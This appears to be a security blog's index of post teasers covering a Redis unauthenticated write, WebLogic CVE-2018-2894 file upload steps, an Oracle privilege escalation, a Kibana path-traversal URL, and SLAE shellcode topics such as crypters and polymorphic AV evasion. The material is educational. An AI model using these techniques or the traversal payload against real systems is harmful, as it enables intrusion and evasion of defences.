Redis service unauthenticated write access to OS file system

Redis is a in memory key-value database. Due to the nature of the database design, typical use cases are session caching, full page cache, message queue applications, leaderboards and counting among others. By default, the service runs on port 6379. In my case, redis was running on a range of ports 7081-7090. So an nmap …

CVE-2018-2894 – Weblogic JSP File Upload

CVE-2018-2894 - Weblogic JSP File Upload vulnerability Oracle weblogic suffers from a trivial file upload vulnerability. Here are the steps to reproduce the vulnerability. 1) Go to http://172.17.0.2:7001/ws_utc/config.do If you can’t access 172.17.0.2:7001/ws_utc. This means the webservice test client is disabled for your weblogic server which is a good thing. 2) Change the Work Home …

CVE-2018-3004 – Oracle Database Privilege Escalation via XML Deserialization

Oracle Database Privilege Escalation via XML Deserialization Since this is a privilege escalation, lets assume you have access to oracle database with atleast the following roles: CONNECT and RESOURCE In this example the user tom has been granted connect and resource roles XML Deserialization Java.beans library has two classes XMLEncoder to serialize a Java object …

CVE-2018-17246 – Kibana Local File Inclusion

Logstash is an open source tool for collecting, parsing, and storing logs for future use. Kibana is a web interface that can be used to search and view the logs that Logstash has indexed. Both of these tools are based on Elasticsearch. Elasticsearch, Logstash, and Kibana, when used together is known as an ELK stack. Vulnerability: Affected URL:  http://<IP>:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../<js file> Affected Parameter: apis The …

SLAE 0x7 – Custom crypter

Crypters are programs that encrypt an executable/shellcode, decrypt it at runtime and then run them. So the idea is to use a key/string to encrypt the shellcode. The encrypted shellcode will then be decrypted with the same key and then run. To understand this further we will create our custom crypter using the AES encryption …

SLAE 0x6 – Polymorphic Shellcode

Anti-Virus and IDS vendors constantly create signatures for any new type of shellcode to keep their products updated to protect against attacks.  But malware developers also try and remain ahead of the game by finding new ways to evade AV/IDS . Today we will cover creating Polymorphic shellcodes that are often used to defeat signature …

SLAE 0x5 – Shellcode Analysis

Today, we find shellcodes on various websites like shell-storm.org, exploit-db.com and other internet forums. Running shellcode without understanding the code could have catastrophic results . For instance, a shellcode could do an rm -rf  on the file system even though the comments in the shellcode indicate otherwise. Therefore, I think its important we learn whats going …

SLAE 0x4 – Custom Encoder

Encoding is the process of converting data from one form to another. Encoding is very different from Encryption. Encoding converts data using an algorithm that can be easily reversed. The purpose of encoding is simply to transform data into another form which can be consumed by another system. On the other hand, Encryption is used to …

SLAE 0x3 – Egghunter Shellcode

Egghunter is shellcode that searches for an 8-byte egg that we delibrately place in memory. Once found, this egg points to a much larger space in memory where are shellcode can run. Egghunter can can be very useful in a buffer overflow situation where we control the flow of the program and cannot execute our …